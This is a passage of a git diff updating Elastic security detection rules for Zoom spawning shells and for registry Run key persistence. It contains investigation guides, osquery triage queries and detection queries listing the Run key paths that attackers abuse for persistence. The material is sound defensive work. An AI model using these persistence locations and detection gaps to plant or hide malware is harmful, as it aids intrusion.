`Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", "related_integrations": [ { @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json index 02940c82197..6ac883e8ec6 100644 --- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json index 1f87aa7860b..cb572f9e7f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json index eddda14d46b..2a6c2a0124f 100644 --- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json index ed88da3e7cb..c97b818e8ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json index d99dabf258c..5fb8ab9ac0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json +++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json index 903b1a2ebdf..3169fbd3a9d 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json index 0d013fb27cb..206b2f4c6dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised 